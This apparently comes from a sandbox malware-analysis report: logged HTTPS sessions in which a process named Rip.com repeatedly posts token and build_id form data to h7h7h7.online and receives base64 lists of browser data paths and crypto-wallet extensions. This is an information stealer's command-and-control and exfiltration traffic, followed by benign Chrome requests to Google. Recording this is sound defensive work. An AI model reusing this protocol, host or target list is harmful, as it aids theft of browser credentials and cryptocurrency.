                                                                                                                                                                                                                                                              2024-12-31 20:40:09 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 61 73 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 61 73 32 64 6a 65 6b 6e 79 75 6b 36 66 33 65 33 65 6b 78 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------as2djeknyuk6f3e3ekx4Content-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------as2djeknyuk6f3e3ekx4Content-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------as2djeknyuk6f3e3ekx4Cont
                                                                                                                                                                                                                                                              2024-12-31 20:40:10 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:10 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:10 UTC2192INData Raw: 38 38 34 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4d 36 58 46 42 79 62 32 64 79 59 57 30 67 52 6d 6c 73 5a 58 4e 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 42 63 48 42 73 61 57 4e 68 64 47 6c 76 62 6c 78 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 49 45 4e 68 62 6d 46 79 65 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 53 42 54 65 46 4e 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 77 6c 54 45 39 44 51 55 78 42 55 46 42 45 51 56 52 42 4a 56 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46
                                                                                                                                                                                                                                                              Data Ascii: 884R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEM6XFByb2dyYW0gRmlsZXNcR29vZ2xlXENocm9tZVxBcHBsaWNhdGlvblx8Y2hyb21lLmV4ZXxHb29nbGUgQ2hyb21lIENhbmFyeXxcR29vZ2xlXENocm9tZSBTeFNcVXNlciBEYXRhfGNocm9tZXwlTE9DQUxBUFBEQVRBJVxHb29nbGVcQ2hyb21lIF


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              4192.168.2.449741116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:11 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----3oh479zmgln7qimyukfu
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 331
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:11 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 33 6f 68 34 37 39 7a 6d 67 6c 6e 37 71 69 6d 79 75 6b 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 33 6f 68 34 37 39 7a 6d 67 6c 6e 37 71 69 6d 79 75 6b 66 75 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 33 6f 68 34 37 39 7a 6d 67 6c 6e 37 71 69 6d 79 75 6b 66 75 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------3oh479zmgln7qimyukfuContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------3oh479zmgln7qimyukfuContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------3oh479zmgln7qimyukfuCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:11 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:11 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:11 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                              Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449742116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:12 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----yuaiwtrqqimg4ekxl6fc
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 332
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:12 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 79 75 61 69 77 74 72 71 71 69 6d 67 34 65 6b 78 6c 36 66 63 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------yuaiwtrqqimg4ekxl6fcContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------yuaiwtrqqimg4ekxl6fcContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------yuaiwtrqqimg4ekxl6fcCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:13 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:13 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:13 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449743116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:14 UTC279OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----sr1dbsjmymym7qi5fcjm
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 6913
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:14 UTC6913OUTData Raw: 2d 2d 2d 2d 2d 2d 73 72 31 64 62 73 6a 6d 79 6d 79 6d 37 71 69 35 66 63 6a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 73 72 31 64 62 73 6a 6d 79 6d 79 6d 37 71 69 35 66 63 6a 6d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 73 72 31 64 62 73 6a 6d 79 6d 79 6d 37 71 69 35 66 63 6a 6d 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------sr1dbsjmymym7qi5fcjmContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------sr1dbsjmymym7qi5fcjmContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------sr1dbsjmymym7qi5fcjmCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:14 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:14 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449744116.203.13.1094437740C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:15 UTC278OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=----9rieusr1n7qieu37yuas
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                                                                                                                              Host: h7h7h7.online
                                                                                                                                                                                                                                                              Content-Length: 489
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              2024-12-31 20:40:15 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 39 72 69 65 75 73 72 31 6e 37 71 69 65 75 33 37 79 75 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 35 30 31 64 34 34 31 30 33 63 35 35 65 66 63 35 66 37 33 64 34 64 61 36 38 38 32 62 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 39 72 69 65 75 73 72 31 6e 37 71 69 65 75 33 37 79 75 61 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 34 63 39 61 63 33 30 63 37 65 38 36 30 31 31 64 39 39 36 62 39 62 36 30 37 36 33 30 37 62 35 0d 0a 2d 2d 2d 2d 2d 2d 39 72 69 65 75 73 72 31 6e 37 71 69 65 75 33 37 79 75 61 73 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                              Data Ascii: ------9rieusr1n7qieu37yuasContent-Disposition: form-data; name="token"2501d44103c55efc5f73d4da6882b199------9rieusr1n7qieu37yuasContent-Disposition: form-data; name="build_id"f4c9ac30c7e86011d996b9b6076307b5------9rieusr1n7qieu37yuasCont
                                                                                                                                                                                                                                                              2024-12-31 20:40:15 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              2024-12-31 20:40:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              8192.168.2.449750172.217.16.1324436632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:18 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-31 20:40:18 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:18 GMT
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              Expires: -1
                                                                                                                                                                                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                              Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-FEHvBN2HjBfTyg3M00freA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-31 20:40:18 UTC124INData Raw: 33 33 65 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 6f 72 77 65 67 69 61 6e 20 63 72 75 69 73 65 20 73 68 69 70 20 6d 61 6e 20 6f 76 65 72 62 6f 61 72 64 22 2c 22 76 65 78 62 6f 6c 74 73 20 74 69 6b 74 6f 6b 20 6c 69 76 65 20 66 6f 6c 6c 6f 77 65 72 20 63 6f 75 6e 74 22 2c 22 70 6f 6c 61 72 20 76 6f 72 74 65 78 20 77 65 61 74 68 65 72 20 66 6f 72 65 63 61 73 74 22 2c 22
                                                                                                                                                                                                                                                              Data Ascii: 33e)]}'["",["norwegian cruise ship man overboard","vexbolts tiktok live follower count","polar vortex weather forecast","
                                                                                                                                                                                                                                                              2024-12-31 20:40:18 UTC713INData Raw: 72 69 70 70 6c 65 20 78 72 70 22 2c 22 62 75 66 66 61 6c 6f 20 62 69 6c 6c 73 20 70 61 74 72 69 6f 74 73 22 2c 22 73 70 61 63 65 78 20 72 6f 63 6b 65 74 20 6c 61 75 6e 63 68 20 74 6f 64 61 79 22 2c 22 73 61 6d 73 75 6e 67 20 67 61 6c 61 78 79 20 73 32 35 20 75 6c 74 72 61 20 63 61 6d 65 72 61 20 6c 65 61 6b 22 2c 22 70 65 61 63 68 20 64 72 6f 70 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70 62 6d 63 67 63 32 56 68 63 6d 4e 6f 5a 58 4d 5c 75 30 30
                                                                                                                                                                                                                                                              Data Ascii: ripple xrp","buffalo bills patriots","spacex rocket launch today","samsung galaxy s25 ultra camera leak","peach drop"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u00
                                                                                                                                                                                                                                                              2024-12-31 20:40:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              9192.168.2.449751172.217.16.1324436632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-31 20:40:19 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.google.com
                                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                                              X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC1018INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Version: 705503573
                                                                                                                                                                                                                                                              Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                              Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                              Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                              Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                              Permissions-Policy: unload=()
                                                                                                                                                                                                                                                              Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                              Date: Tue, 31 Dec 2024 20:40:19 GMT
                                                                                                                                                                                                                                                              Server: gws
                                                                                                                                                                                                                                                              X-XSS-Protection: 0
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                              Accept-Ranges: none
                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              2024-12-31 20:40:20 UTC372INData Raw: 31 33 39 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 61 20 67 62 5f 32 64 20 67 62 5f 51 65 20 67 62 5f 71 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65
                                                                                                                                                                                                                                                              Data Ascii: 1394)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
